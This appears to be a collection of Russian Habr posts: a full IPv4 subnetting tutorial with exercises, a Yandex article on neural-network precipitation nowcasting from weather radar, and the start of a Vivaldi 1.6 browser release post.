Выше мы говорили о структуре телефонных номеров и их иерархии. И вот на заре рождения Интернета в том представлении, в каком мы его привыкли видеть, возник вопрос. Вопрос заключался в том, что IP-адреса нужно как-то сгруппировать и контролировать выдачу. Решением было разделить все пространство IP-адресов на классы. Это решение получило название классовая адресация (от англ. Classful) . Она уже давно устарела, но практически в любой книге на нее отводятся целые главы и разделы. Cisco тоже не забывает про это и в своих учебных материалах рассказывает про нее. Поэтому я пробегусь по этой теме и покажу, чем она блистала с 1981 по 1995 год.
Пространство было поделено на 5 классов. Каждому классу был назначен блок адресов. Начнем с класса A . Если внимательно посмотреть на таблицу, то можно заметить, что этому блоку дан самый большой блок адресов, а если быть точным, то половина всего адресного пространства. Предназначался данный класс для крупных сетей. Структура этого класса выглядит следующим образом.
В чем суть. Первый октет, то есть 8 бит, остаются за адресом сети, а 3 последних октета (то есть оставшиеся 24 бита) назначаются хостам. Вот для того, чтобы показать, какой кусок относится к сети, а какой к хостам, используется маска . По структуре записи она аналогична записи IP-адреса. Отличие маски от IP-адресов в том, что 0 и 1 не могут чередоваться. Сначала идут 1, а потом 0. Таким образом, там где есть единица, значит это участок сети. Чуть ниже, после разбора классов, я покажу, как с ней работать. Сейчас главное знать, что маска класса A — 255.0.0.0. В таблице еще упомянут какой-то первый бит и для класса A он равен 0. Этот бит как раз нужен для того, чтобы сетевое устройство понимало, к какому классу оно принадлежит. Он же еще задает начальный и конечный диапазон адресов. Если в двоичном виде записать на всех октетах единицы, кроме первого бита в первом октете (там всегда 0), то получится 127.255.255.255, что является границей класса A. Например, возьмем адрес 44.58.63.132. Мы знаем, что у класса A первый октет отдается под адрес сети. То есть «44» — это адрес сети, а «58.63.132» — это адрес хоста. Поговорим про класс B
Этому классу был дан блок поменьше. И адреса из этого блока предназначались для сетей средних масштабов. 2 октета отданы под адрес сети, и 2 — под адрес хостов. Маска у B класса — 255.255.0.0. Первые биты строго 10. А остальные меняются. Перейдем к примеру: 172.16.105.32. Два первых октета под адрес сети — «172.16». А 3-ий и 4-ый под адрес хоста — «105.32». Класс C
Этот класс обделили адресами и дали ему самый маленький блок. Он был предназначен для мелких сетей. Зато этот класс отдавал целых 3 октета под адрес сети и только 1 октет — под хосты. Маска у него — 255.255.255.0. Первые биты 110. На примере это выглядит так — 192.168.1.5. Адрес сети «192.168.1», а адрес хоста «5». Классы D и E . Я неcпроста объединил их в один. Адреса из этих блоков зарезервированы и не могут назначаться сетям и хостам. Класс D предназначен для многоадресной рассылки. Аналогию можно привести с телевидением. Телеканал вещает группе лиц свой эфир. И те, кто подключены, могут смотреть телепередачи. То есть в распоряжение администраторов могут попасть только 3 первых класса.
Напомню, что первые биты у класса D — это 1110. Пример адреса — 224.0.0.5.
А первые биты у класса E — это 1111. Поэтому, если вдруг увидите адрес вида 240.0.0.1, смело говорите, что это адрес E класса.
Про классы обмолвились. Теперь озвучу вопрос, который мне недавно задали. Так зачем тогда маски? У нас итак хосты понимают в каком они классе. Но суть вот в чем. Например, у вас есть маленький офис, и вам нужен блок IP-адресов. Никто не будет вам выдавать все адреса класса C. А дадут только его кусок. Например 192.168.1.0 с маской 255.255.255.0. Так вот эта маска и будет определять вашу границу. Мы уже говорили, что октет варьируется в значении от 0 до 255. Вот этот 4 октет полностью в вашем распоряжении. За исключением первого адреса и последнего, то есть 0 и 255 в данном случае. Первый адрес — это адрес сети (в данном случае 192.168.1.0), а последний адрес — широковещательный адрес (192.168.1.255). Напомню, что широковещательный адрес используется в том случае, когда надо передать информацию всем узлам в сети. Поэтому есть правило. Если вам надо узнать номер сети, то все биты относящиеся к хосту обращаете в 0, а если широковещательный, то все биты — в 1. Поэтому, если из 256 адресов забирается 2 адреса, то на назначение хостам остается 254 адреса (256 — 2). На собеседованиях и экзаменах часто любят спрашивать: «Количество IP-адресов в сети?» и «Сколько доступных IP-адресов в сети для назначения хостам?». Два разных вопроса, которые могут поставить в тупик. Ответом на первый будет — все адреса, включая адрес сети и широковещательный адрес, а на второй вопрос — все адреса, кроме адреса сети и широковещательного адреса.
Теперь углубимся в изучении маски.
Я записал адрес класса C 192.168.1.1 с маской 255.255.255.0 в десятичном и двоичном формате. Обратите внимание на то, как выглядит IP-адрес и маска в двоичном формате. Если в IP-адресе 0 и 1 чередуются, то в маске сначала идут 1, а потом 0. Эти биты фиксируют адрес сети и задают размер. По таблице выше можно сделать вывод, что в двоичном виде маска представлена последовательностью 24 единиц подряд. Это говорит о том, что целых 3 октета выделено под сеть, а 4 октет свободен под адресацию для хостов. Здесь ничего необычного. Это стандартная маска класса C.
Но вот в чем загвоздка. Например, в вашем офисе 100 компьютеров, и расширяться вы не планируете. Зачем плодить сеть из 250+ адресов, которые вам не нужны?! На помощь приходит разделение на подсети. Это очень удобная вещь. Объясню принцип на примере того же класса C. Как бы вы не хотели, но трогать 3 октета нельзя. Они фиксированы. Но вот 4 октет свободен под хосты, поэтому его можно трогать. Заимствуя биты из хостового куска, вы дробите сеть на n-ое количество подсетей и, соответственно, уменьшаете в ней количество адресов для хостов.
Попробуем это воплотить в реальность. Меняю маску. Заимствую первый бит из хостовой части(то есть 1-ый бит 4-ого октета выставляю в единицу). Получается следующая маска.
Данная маска делит сеть на 2 части. Если до дробления у сети было 256 адресов(от 0 до 255), то после дробления у каждого куска будет по 128 адресов(от 0 до 127 и от 128 до 255).
Теперь посмотрю, что изменится в целом с адресами.
Красным цветом я показал те биты, которые зафиксированы и не могут изменяться. То есть маска ей задает границу. Соответственно биты помеченные черным цветом определены для адресации хостов. Теперь вычислю эту границу. Чтобы определить начало, надо все свободные биты(помеченные черным цветом) обратить в ноль, а для определения конца обратить в единицы. Приступаю.
То есть в четвертом октете меняются все биты, кроме первого. Он жестко фиксирован в рамках этой сети.
Теперь посмотрим на вторую половину сети и вычислим ее адреса. Деление у нас производилось заимствованием первого бита в 4-ом октете, значит он является делителем. Первая половина сети получалась, когда этот бит принимал значение 0, а значит вторая сеть образуется, когда этот бит примет значение 1. Обращаю этот бит в 1 и посмотрю на границы.
Приведу в десятичный вид.
Соответственно .128 и .255 назначать хостам нельзя. Значит в доступности 128-2=126 адресов.
Вот таким образом можно при помощи маски управлять размером сети. Каждый заимствованный бит делит сеть на 2 части. Если откусить 1 бит от хостовой части, то поделим на 2 части (по 128 адресов), 2 бита = 4 части (по 64 адреса), 3 бита = 8 (по 32 адреса) и так далее.
Если вы рассчитали количество бит, отдаваемые под хосты, то количество доступных IP-адресов можно вычислить по формуле
В книге У. Одома по подготовке к CCNA R&S приведена хорошая формула для расчета битов, отдаваемых на подсеть и хосты: N + S + H = 32 , где N — кол-во битов сети (класс A — 8 бит, B — 16 бит, C — 24 бита), S — кол-во заимствованных битов на подсеть (это то, что мы делали выше, когда заимствовали 1 бит из хостовой части), H — кол-во бит отводимых хостам.
Внесу ясность и объясню, как и где применять эти формулы.
Возьмем пример:
Нам выдали сеть 172.16.0.0 и попросили создать 120 подсетей со 180 хостами и записать маску. Приступим.
В качестве шпаргалки, и для быстроты вычисления, я ниже подготовил таблицу степеней двойки.
Двигаемся дальше. Первое главное условие, при использовании классовой адресации — это то, что должна использоваться одна маска для всех подсетей. То есть, если у вас для одной подсети маска 255.255.255.0, то для другой подсети она не может быть 255.255.255.128.
Теперь смотрим на выданную сеть. Путем логических размышлений понимаем, что это адрес класса B. А значит его N (кол-во битов сети) = 16. Ок. Значит на хосты выделено тоже 16 бит. Вспоминаем условия задачи. Нужно создать 120 подсетей. «Откусывать» биты от сетевой части запрещено, значит кусаем от хостовой части.
Теперь нужно взять такое кол-во бит, чтобы хватило для 120 подсетей, однако оставляло достаточное кол-во под биты для хоста. Смотрим на таблицу выше. Если взять 7 бит, то получим 128. 128>120, следовательно попадаем под условие. Если возьмем 6 бит, то получим 64. 64
Ок. Выяснили, что S надо выделить не меньше 7 бит. Теперь посмотрим, что осталось под хосты.
Если N + S + H = 32 => H = 32 — (N + S) => H = 32 — (16 + 7) = 9. Смотрим на таблицу выше (или возводим 2 в 9 степень в уме) и получаем число 512. Отнимаем 2 (адрес сети и широковещательный адрес) и получаем 510 адресов. Нам нужно 180, а значит под условие мы попадаем причем с большим запасом. В таких случаях вам предоставляется право выбора. Сделать больше подсетей или хостов на подсеть. Объясняю, что это значит. У нас есть 9 бит на хосты. Если мы возьмем 8 бит, то получим число 256. 256 — 2 = 254 адреса. Этот вариант нам тоже подходит. Возьмем 7 бит. Получаем 128. Даже не отнимая 2 адреса, становится понятно, что это меньше 180 => данный вариант отбрасывается сразу. Итого получаем, что минимальное количество для подсети — 7 бит, а для хостов — 8 бит. Поэтому свободный бит можно отдать либо на подсеть, либо на хосты. Маска получается сложением N и S. В нашем случае получаем, если под подсеть отдаем 7 бит, то получаем 23. В десятичном виде маска будет выглядеть 255.255.254.0. А если отдадим под подсеть 8 бит, то получим 24 (или в десятичном виде 255.255.255.0). Иногда бывает, что под задачу существует всего одна маска. Ну и, конечно, могут быть случаи, когда маска не попадает не под какие условия. В этих случаях нужно брать сеть другого класса или доказывать заказчику, что это невозможно.
Думаю теперь понятно, как работала классовая адресация, и как ее рассчитывали. Возможно с первого раза голова не переварит этого, поэтому перечитывайте еще раз и повнимательнее. Как только начнет что-то проясняться, потренируйтесь на задачках, которые я оставлю. Задача №2
1) Записать маску для проекта: сеть 172.16.0.0. 250 подсетей и 220 хостов.
2) Записать маску для проекта: сеть 10.0.0.0. 2000 подсетей и 1500 хостов.
3) Записать маску для проекта: сеть 192.168.0.0. 4 подсети и 60 хостов. Ответы на задачи 1) 24 бита или 255.255.255.0
2) 19 бит (255.255.224.0), 20 бит (255.255.240.0), 21 бит (255.255.248.0)
3) 26 бит или 255.255.255.192
На этом разговор про классовые сети начну закруглять и подведу итоги. Классовая адресация — это зарождение сегодняшнего интернета, и именно с нее все началось. Поэтому плюсов у нее много, и за это создателям спасибо. Но, как вы могли заметить, у нее было жесткая привязка к одной маске. За счет этого IP-адреса использовались не экономно и расточительно. А в связи с бурным ростом Интернета адресов стало не хватать, и срочно нужно было вносить изменения.
Поняли ведущие умы, что использовать классовые сети не удобно и нужно от них отказываться. Это привело к созданию бесклассовой адресации и маскам переменной длины, о чем мы ниже поговорим. Но перед этим пару слов о видах IP-адресов. Несмотря на то, что переход от классовой адресации к бесклассовой предполагал экономию IP-адресов, на деле эта проблема все равно решалась не полностью. Все упиралось в саму технологию IPv4. Объясню почему. Выше я говорил, что длина IP адреса равна 32 бита. Каждый бит может принимать значение 0 или 1, то есть два значения. Соответственно, чтобы вычислить все комбинации, надо возвести 2 в 32-ую степень. Получаем 4294967296 адресов. Если вычесть отсюда зарезервированные для специальных нужд и прочего, то останется примерно 4.2 млрд. адресов, когда на Земле проживает около 7.3 млрд. человек. Поэтому ведущие умы быстро просекли эту фишку и начали искать решение. Они решили выделить некое адресное пространство, которое будет использоваться только в пределах локальной сети и не будет использоваться в Интернете. Это разделило адреса на 2 лагеря: белые или публичные (англ. public) и серые или частные (англ. private).
Привожу диапазон адресов, которые выделены под локальные сети:
1) 10.0.0.0 — 10.255.255.255 с маской 255.0.0.0 (или кратко 10/8).
2) 172.16.0.0 — 172.31.255.255 с маской 255.240.0.0 (или кратко 172.16/12).
3) 192.168.0.0 — 192.168.255.255 (или кратко 192.168/16).
Если честно, я мало где видел применение адресации 172.16.X.X. Обычно в корпоративной среде всегда используется 10.X.X.X, а в домах/квартирах и мелких офисах 192.168.X.X.
Теперь прошу обратить внимание на очень важную вещь, которую многие путают. Не путайте классовую адресацию и диапазон частных адресов. Очень много людей наступают на эти грабли и свято верят, что диапазон частных адресов 10.0.0.0 — 10.255.255.255 — это диапазон A класса.
Разобрались, что такое частные адреса или private адреса. Но это еще не все. Есть еще список зарезервированных адресов, которые не могут светиться в Интернете. По ним написана целая документация на IETF. Привожу ссылку , где можете прочитать оригинал. Я кратко опишу часто встречающиеся.
1) 0.0.0.0/8 — диапазон адресов, используемый хостами для самоидентификации. Обычно это можно увидеть, когда хост пытается получить IP-адрес от DHCP сервера. Так как изначально у него нету IP-адреса, то в поле источника он вставляет адрес из данного диапазона.
2) 127.0.0.0/8 — loopback или localhost адреса. Это IP-адреса, используемые компьютером, чтобы обратиться к самому себе. Очень полезно для проверки работы TCP/IP. Дело в том, что независимо от наличия соединения с Интернетом или локальной сетью, адреса из этого пула должны всегда пинговаться. Если этого не происходит, значит система накрылась или накрывается медным тазом.
3) 169.254.0.0/16 — link-local address или локальные адреса. Автоматически используются хостами при отсутствии DHCP-сервера или его недоступности. Это позволяет быстро организовать локальную сеть и проверить работу узлов. Однако данный пул адресов не маршрутизируется. Следовательно, выйти в Интернет с них не получится.
4) 224.0.0.0/4 — блок адресов, зарезервированный под многоадресную рассылку или multicast. Для тех, кто хочет побольше узнать про multicast, оставляю ссылку . Бесклассовая адресация (англ. Classless Inter-Domain Routing или CIDR) . Описана была в стандарте RFC1519 в 1993 году. Она отказалась от классовых рамок и фиксированной маски. Адреса делятся только на публичные и зарезервированные, о которых написано выше. Если в классовой адресации маска нарезалась единой для всех подсетей, то в бесклассовой — у каждой подсети может быть своя маска. На теории все хорошо и красиво, но нет ничего лучше, чем практика. Поэтому перехожу к ней и объясню, как можно делить на подсети с разным количеством хостов.
В качестве шпаргалки приведу список всех возможных масок.
Представим ситуацию. Вам выдали сеть 192.168.1.0/24 и поставили следующие условия:
1) Подсеть на 10 адресов для гостей.
2) Подсеть на 42 адреса для сотрудников.
3) Подсеть на 2 адреса для соединения 2 маршрутизаторов.
4) Подсеть на 26 адресов для филиала.
Ок. Данная маска показывает, что в нашем распоряжении находятся 256 адресов. По условию эту сеть надо каким-то образом разделить на 4 подсети. Давайте попробуем. 256 очень хорошо делится на 4, давая в ответе 64. Значит один большой блок в 256 адресов можно поделить на 4 равных блока по 64 адреса в каждом. И все было бы прекрасно, но это порождает большое число пустых адресов. Для сотрудников, которым нужно 42 адреса, ладно, может в дальнейшем компания еще наймет. Но вот подсеть для маршрутизаторов, которая требует всего 2 адреса, оставит 60 пустых адресов. Да, вы можете сказать, что это private адреса, и кому дело до них. А теперь представьте, что это публичные адреса, которые маршрутизируются в Интернете. Их и так мало, а тут мы еще будем их отбрасывать. Это не дело, тем более, когда мы можем гибко управлять адресным пространством. Поэтому возвращаемся к примеру и нарежем подсети так, как нам нужно.
Итак, какие подсети должны быть нарезаны, чтобы вместились все адреса, заданные по условию?!
1) Для 10 хостов, наименьшей подсетью будет блок из 16 адресов.
2) Для 42 хостов, наименьшей подсетью будет блок из 64 адресов.
3) Для 2 хостов, наименьшей подсетью будет блок из 4 адресов.
4) Для 26 хостов, наименьшей подсетью будет блок из 32 адресов.
Я понимаю, что не все могут с первого раза в это вникнуть, и в этом нет ничего страшного. Все люди разные и по-разному воспринимают информацию. Для полноты эффекта покажу деление на картинке.
Вот у нас блок, состоящий из 256 адресов.
После деления на 4 части получается следующая картинка.
Выше мы выяснили, что при таком раскладе адреса используются не рационально. Теперь обратите внимание, как стало выглядеть адресное пространство после нарезки подсетей разной длины.
Как видите, в свободном доступе осталось куча адресов, которые мы в дальнейшем сможем использовать. Можно посчитать точную цифру. 256 — (64 + 32 + 16 + 4) = 140 адресов.
Вот столько адресов мы сэкономили. Двигаемся дальше и ответим на следующие вопросы:
— Какими будут сетевые и широковещательные адреса?
— Какие адреса можно будет назначить хостам?
— Как буду выглядеть маски?
Механизм деления на подсети с разной маской получил название VLSM (от англ. Variable Length Subnet Mask) или маска подсети переменной длины . Дам важный совет! Начинайте адресацию с самой большой подсети. Иначе вы можете попасть на то, что адреса начнут перекрываться. Поэтому сначала планируйте сеть на бумаге. Нарисуйте ее, изобразите в виде фигур, просчитайте вручную или на калькуляторе и только потом переходите настройке в боевых условиях.
Итак, самая большая подсеть состоит из 64 адресов. С нее и начнем. Первый пул адресов будет следующий:
Адрес подсети — 192.168.1.0.
Широковещательный адрес — 192.168.1.63.
Пул адресов для назначения хостам от 192.168.1.1 до 192.168.1.62.
Теперь выбор маски. Тут все просто. Отнимаем от целой сети нужный кусок и полученное число записываем в октет маски. То есть 256 — 64 = 192 => маска 255.255.255.192 или /26.
Дальше идет подсеть поменьше. Состоит она из 32 адресов. Если первая заканчивалась на .63, то эта будет начинаться с .64:
Адрес подсети — 192.168.1.64.
Широковещательный адрес — 192.168.1.95.
Пул адресов для назначения хостам будет от 192.168.1.65 до 192.168.1.94.
Маска: 256 — 32 = 224 => 255.255.255.224 или /27.
3-я подсеть, которая предназначена для филиала, начнет старт с .96:
Адрес подсети — 192.168.1.96.
Широковещательный адрес — 192.168.1.111.
Пул адресов для назначения хостам будет от 192.168.1.97 до 192.168.1.110.
Маска: 256 — 16 = 240 => 255.255.255.240 или /28.
Ну и для последней подсети, которая уйдет под интерфейсы, соединяющие роутеры, будет начинаться с .112:
Адрес подсети — 192.168.1.112.
Широковещательный адрес — 192.168.1.115.
Разрешенными адресами будут 192.168.1.113 и 192.168.1.114.
Маска: 256 — 4 = 252 => 255.255.255.252 или /30.
Замечу, что адрес 192.168.1.115 является последним используемым адресом. Начиная с 192.168.1.116 и до .255 свободны.
Вот таким образом, при помощи VLSM или масок переменной длины, мы экономно создали 4 подсети с нужным количеством адресов в каждой. Думаю это стоит закрепить задачкой для самостоятельного решения. Задача №3
Разделите сеть 192.168.1.0/24 на 3 разные подсети. Найдите и запишите в каждой подсети ее адреса, широковещательный адрес, пул разрешенных к выдаче адресов и маску. Указываю требуемые размеры подсетей:
1) Подсеть на 120 адресов.
2) Подсеть на 12 адресов.
3) Подсеть на 5 адресов. Ответ 1) Адрес подсети — 192.168.1.0.
Широковещательный адрес — 192.168.1.127.
Пул адресов для назначения хостам будет от 192.168.1.1 до 192.168.1.126.
Маска: 256 — 128 = 128 => 255.255.255.128 или /25.
2) Адрес подсети — 192.168.1.128.
Широковещательный адрес — 192.168.1.143.
Пул адресов для назначения хостам будет от 192.168.1.129 до 192.168.1.142.
Маска: 256 — 16 = 240 => 255.255.255.240 или /28.
3) Адрес подсети — 192.168.1.144.
Широковещательный адрес — 192.168.1.151.
Пул адресов для назначения хостам будет от 192.168.1.145 до 192.168.1.150.
Маска: 256 — 8 = 248 => 255.255.255.248 или /29.
Теперь, когда вы знаете, как делить сети на подсети, самое время научиться собирать подсети в одну общую подсеть. Иначе это называется суммированием или summarization . Суммирование чаще всего используется в маршрутизации. Когда у вас в таблице маршрутизатора несколько соседних подсетей, маршрутизация которых проходит через один и тот же интерфейс или адрес. Скорее всего этот процесс лучше объяснять при разборе маршрутизации, но учитывая то, что тема маршрутизации и так большая, то я объясню процесс суммирования в этой статье. Тем более, что суммирование это сплошная математика, а в этой статье мы ею и занимаемся. Ну что же, приступлю.
Представим, что у меня компания состоящая из главного здания и корпусов. Я работаю в главном здании, а в корпусах коллеги. Хоть у меня и главное здание, но в нем всего 4 подсети:
— 192.168.0.0/24
— 192.168.1.0/24
— 192.168.2.0/24
— 192.168.3.0/24
Тут коллеги с соседнего здания очухались и поняли, что у них слетела конфигурация на маршрутизаторе, а бекапов нет. Наизусть они не помнят, какие в главном здании подсети, но помнят, что они находятся рядом друг с другом, и просят прислать одну суммированную. Теперь у меня возникает задача, как их суммировать. Для начала я переведу все подсети в двоичный вид.
Посмотрите внимательно на таблицу. Как видите, у 4 подсетей первые 22 бита одинаковые. Соответственно, если я возьму 192.168.0.0 с маской /22 или 255.255.252.0, то покрою свои 4 подсети. Но обратите внимание на 5 подсеть, которую я специально ввел. Это подсеть 192.168.4.0. 22-ой бит у нее отличается от предыдущих 4-х, а значит выше выбранное не покроет эту подсеть.
Ок. Теперь я отправлю коллегам суммированную подсеть, и, если они все правильно пропишут, то маршрутизация до моих подсетей будет работать без проблем.
Возьмем тот же пример и немного изменим условия. Нас попросили прислать суммарный маршрут для подсетей 192.168.0.0 и 192.168.1.0. Я не поленюсь и создам еще одну таблицу.
Обратите внимание, что у 2 первых подсетей одинаковые не 22 бита, а 23 бита. Это значит, что их можно просуммировать еще компактнее. В принципе работать будет и так, и так. Но как говорилось в одной рекламе: «Если нет разницы — зачем платить больше?». Поэтому старайтесь суммировать, не задевая при этом соседние подсети.
Таким образом, переводя подсети в двоичный формат и находя одинаковые биты, можно их суммировать.
Вообще суммирование полезно применять, когда надо объединить несколько подсетей, расположенных вблизи друг с другом. Это позволит сэкономить ресурсы маршрутизаторов. Однако это не всегда возможно. Просуммировать, например, подсеть 192.168.1.0 и 192.168.15.0, не захватив при этом соседние подсети, невозможно. Поэтому перед суммированием стоит подумать над ее целесообразностью. Поэтому повторюсь еще раз, что начинать какую-либо революцию надо на бумажке. Ну и для закрепления материала оставлю небольшую задачу. Задача №4
Даны 4 подсети:
1) 10.3.128.0
2) 10.3.129.0
3) 10.3.130.0
4) 10.3.131.0
Просуммируйте подсети и найдите маску, которая сможет покрыть их, не задевая при этом соседние подсети. Ответ
Исходя из этого, ответом будет 10.3.128.0/22 (255.255.252.0)
Пришло время закругляться. Статья получилась не очень длинной. Я бы даже сказал наоборот. Но все, что требует знать Cisco про IPv4, мы рассмотрели. Самое главное, что требуется от вас — это научиться работать с адресами и масками и уметь конвертировать их из десятичной в двоичную и обратно. Ну и, конечно, правильно делить на подсети и распределять адресное пространство. Спасибо, что дочитали. А если еще и задачки все сами прорешали, то цены вам нет) А если еще не прорешали, то приятного времяпровождения. | https://habrahabr.ru/post/314484/ |
habrahabr | Яндекс использовал нейросеть и научился прогнозировать осадки с точностью до минут | ['погода', 'нейронные сети', 'сверточные нейронные сети', 'яндекс.погода', 'прогнозирование', 'радарные системы', 'осадки'] | Сегодня я вновь хотел бы поговорить с вами о погоде. Вновь — потому что почти год назад мы уже о ней разговаривали: я рассказал про нашу технологию построения прогнозов Метеум, основанную на... | Сегодня я вновь хотел бы поговорить с вами о погоде. Вновь — потому что почти год назад мы уже о ней разговаривали : я рассказал про нашу технологию построения прогнозов Метеум, основанную на метеомоделировании и машинном обучении. Теперь я хочу поговорить не о той погоде, которая будет завтра, на следующей неделе или в новогоднюю ночь, — а о той, которая уже установилась за окном, и о той, которая наступит в ближайшие несколько часов.
Под катом я расскажу о том, что такое наукастинг и как мы над ним работали. Текущая погода влияет на огромное количество наших ежедневных решений. Если за окном сильный снегопад, мы раздумываем, как нам поехать на работу — на машине или на общественном транспорте. Глядя в окно, решаем, брать ли с собой зонт и нужна ли непромокаемая куртка. Даже стоя на выходе из метро в проливной дождь, мы гадаем, когда он кончится. Если через пять минут — то можно подождать и прийти на встречу в сухом костюме, а если через полчаса — то придётся либо промокнуть, либо опоздать. Для всех этих небольших, но важных решений нам нужна максимально точная информация о том, какая погода сейчас и как она будет меняться в ближайшей перспективе. Вы наверняка сталкивались с ситуацией, когда в одном районе города светит солнце, а в другом льёт проливной дождь с грозой. Как это делалось раньше
Поскольку текущая погода важна нашим пользователям, именно об этом параметре сервиса люди чаще всего пишут в отзывах, включая негативные. Казалось бы, нужно всего лишь посмотреть за окно и показать на сервисе правильную погоду. Но описать ситуацию за окном в любой точке страны или мира — задача не из простых.
Во-первых, метеостанции расположены далеко друг от друга и измеряют параметры в строго определённые промежутки времени. Казань, например, является огромным городом, а метеостанций там всего две: в центре и в аэропорту. Температура и другие показатели в этих точках и в соседних с ними районах могут кардинально различаться.
Во-вторых, из-за ошибок в начальных условиях прогнозные модели тоже не могут служить надёжным источником информации о фактической обстановке на улице.
Да и требования к сиюминутному прогнозу значительно выше: всегда можно выглянуть за дверь и проверить, правы ли метеорологи.
Ещё раз напомню, что в Яндекс.Погоде используется технология Метеум, основанная на метеорологических моделях и машинном обучении. Построенная на базе Матрикснета и обученная на больших массивах данных, наша формула оптимальным образом комбинирует подаваемые на вход факторы. В итоге прогноз получается заметно более точным.
А чтобы показать на сервисе нынешнюю погоду, мы (помимо прогнозов из математических моделей) подмешиваем в формулу измерения, недавно полученные на ближайших метеостанциях. Такой подход существенно лучше других вариантов решения поставленной задачи. Точность определения погоды в ближайшие часы сильно возрастает, и это неудивительно, поскольку мы учитываем наиболее оперативную и точную информацию. Наши метрики существенно возросли по сравнению с нашими же собственными прогнозами, построенными до того, как мы начали подмешивать свежие данные с метеостанций. В мае этого года, сразу после их добавления, мы расширили зону действия Метеума на всю Россию, а в ноябре-декабре — на Украину, Беларусь и Казахстан.
Но даже комбинированный подход из моделей и данных, склеенных при помощи Матрикснета, не даёт желаемой точности. Особенно это касается осадков — одного из самых важных для пользователя параметров. Основная причина такого несовершенства — недостаток данных. Метеостанции, как уже было сказано, расположены далеко друг от друга. Используя взятые со станций данные, вы не можете сообщить пользователю, что ему стоит подождать 10 минут в подземном переходе и проливной дождь на улице сменится переменной облачностью. Где можно достать ещё какие-нибудь данные о состоянии атмосферы? Нужно больше данных
Самым последним достижением науки и техники в области мониторинга осадков является метеорологический радиолокатор. Примерно раз в 10 минут он строит трёхмерный снимок атмосферы в радиусе 200 километров от своего местоположения по горизонтали и до 10 километров по вертикали. По принципу действия радиолокатор очень похож на авиационный радар, только на снимке видны не самолёты, а области атмосферы, где есть капли воды размером более 50 микрометров. Если такие капли и правда есть, то, скорее всего, из облака, в котором они находятся, выпадают осадки. Вот как выглядит сам радар и результаты его работы:
В России уже сейчас существует сеть метеорологических радаров достаточно высокого качества. Они установлены в наиболее населённых и интересных с метеорологической точки зрения регионах. Область покрытия радаров показана на карте:
Кстати, в незакрашенной области проживает более 40 процентов населения России. Данные радара имеют пространственное разрешение 2 на 2 километра на пиксель, что позволяет описывать текущую погоду с точностью до небольшого микрорайона.
В этом году Яндекс получил официальный доступ к измерениям, которые проводятся на сети радиолокаторов Росгидромета. С тех пор мы интенсивно работали над добавлением этих данных в наши продукты.
Сегодня мы готовы представить технологию наукастинга — краткосрочного гиперлокального прогноза осадков. Наукастинг — слово, пришедшее к нам из английского языка, сложенное из двух слов: now и forecasting, то есть дословно «прогноз на сейчас». А на самом деле через продукты Яндекса теперь можно узнать о распределении осадков во временном промежутке от двух часов назад до двух часов вперёд.
Наш новый продукт основан на свёрточных нейронных сетях. С точки зрения математики задача формулируется следующим образом: необходимо по последовательности радарных снимков и релевантной метеорологической информации предсказать будущие карты осадков с временным разрешением в 10 минут на 2 часа вперёд.
Для решения этой задачи мы выбрали свёрточную сеть определённой архитектуры. Каждый свёрточный слой сети представляет собой последовательный набор фильтров, автоматически выделяющих признаки из набора данных, подаваемых на вход. Совокупность таких слоёв позволяет выделить большое количество признаков, по которым можно судить о том, что будет происходить с осадками в выделенной области. Начнутся они или, наоборот, закончатся? Или же просто повысится их интенсивность? Всё это можно определить.
Чтобы настроить фильтры свёрточной сети и веса между ними, мы формируем обучающую выборку достаточно большого объёма — сейчас она состоит более чем из 800 000 кадров с каждого радара, прошедших предварительную обработку. Обучение нейронной сети происходит на кластере из GPU.
Вот как выглядит эта сеть: Архитектура сети
В целом, движение осадков можно разделить на две компоненты: перенос области с осадками по направлению ветра и изменение формы области. За каждую из компонент отвечают отдельные ветви нейросети, что позволяет гибко подбирать параметры оптимизации.
Что касается data flow — вот как его упрощённо описывает автор, nes8bit : Данные радаров и наукастинга, которые передаются на бэкенд погоды, сначала интерполируются с азимутальной проекции, центром которой является радар, на регулярную широтно-долготную. Затем на полученной сетке строятся контуры, описывающие области осадков в зависимости от интенсивности и типа. Контуры хранятся в виде полигонов в PostgreSQL. Часть данных, например с описанием облачности, хранится в растровом виде в том же PostgreSQL: это позволяет быстро отвечать о значениях определённых переменных в конкретной координате, одновременно сохраняя консистетность с векторизированным представлением в виде полигонов. Метрики
Мы оцениваем точность продукта и настраиваем наш нейросетевой прогноз погоды по нескольким типам метрик.
Во-первых, нам важно, насколько правильно мы предсказали каждый следующий кадр нашего прогноза. Мы используем покадровую метрику f-score, которую можно определить как «точность предсказания текущего снимка».
Во-вторых, нам интересны метрики для тех точек пространства, где в ближайшее время произойдёт изменение погодного состояния. С помощью них мы узнаём самое главное: насколько точно определено время начала или окончания дождя и, соответственно, насколько хорошо срабатывает сценарий, при котором пользователь ждёт окончания осадков. Мы находим нужные точки и фиксируем соответствия и несоответствия между прогнозом и реальностью в каждый момент времени.
Вот как выглядит f-мера для первой метрики в зависимости от горизонта:
Надо сказать, что если рассчитать такие же строгие метрики для регулярного прогноза любого провайдера, значения будут не больше 0,1, а чаще — очень близки к нулю. Это связано как с различиями в самой методике прогнозирования, так и с отсутствием большого и важного источника данных.
Мы выбрали типы метрик, ориентируясь на то, как новые данные будут представлены в продукте. На главной странице Яндекс.Погоды теперь есть сообщение об осадках в ближайшие два часа. Из этого блока можно узнать, что осадки закончатся с минуты на минуту или начнутся в течение получаса. Нажав на сообщение, вы увидите, как области с осадками распределены в вашем районе. На этой же карте отмечены и все остальные области в зонах действия радаров. Вместо послесловия
Скажу ещё пару слов о том, о чём говорил в самом начале. Технология, которую мы представили сегодня, разработана специально для того, чтобы сделать жизнь наших пользователей чуть более комфортной. Гиперлокальный краткосрочный прогноз осадков поможет людям принимать решения, основываясь на информации из принципиально нового источника — сети метеорологических радаров. Данные об интенсивном снегопаде с детализацией до районов вашего города помогут узнать о количестве снега на дорогах, а предупреждение о проливном дожде позволит не простудиться весной.
Сейчас это может показаться невероятным, но скоро наступит лето и все мы будем кататься на велосипедах, роликовых коньках, гулять в парках, отдыхать на природе. И с сегодняшнего дня можно строить планы на ближайшее время, глядя не на низкий или высокий полёт ласточек, а на страницу и приложения Яндекс.Погоды . Один всем вам знакомый персонаж уже так и делает. | https://habrahabr.ru/company/yandex/blog/317626/ |
habrahabr | Финальная версия Vivaldi 1.6 — работаем с вкладками | ['vivaldi', 'vivaldi technologies', 'финал', '1.6', 'браузеры'] |
Всем привет! Новый год уже не за горами, и коллектив разработчиков браузера Vivaldi подготовил небольшой подарок всем пользователям — новую версию Vivaldi 1.6. Учитывая, что с момента выхода... |
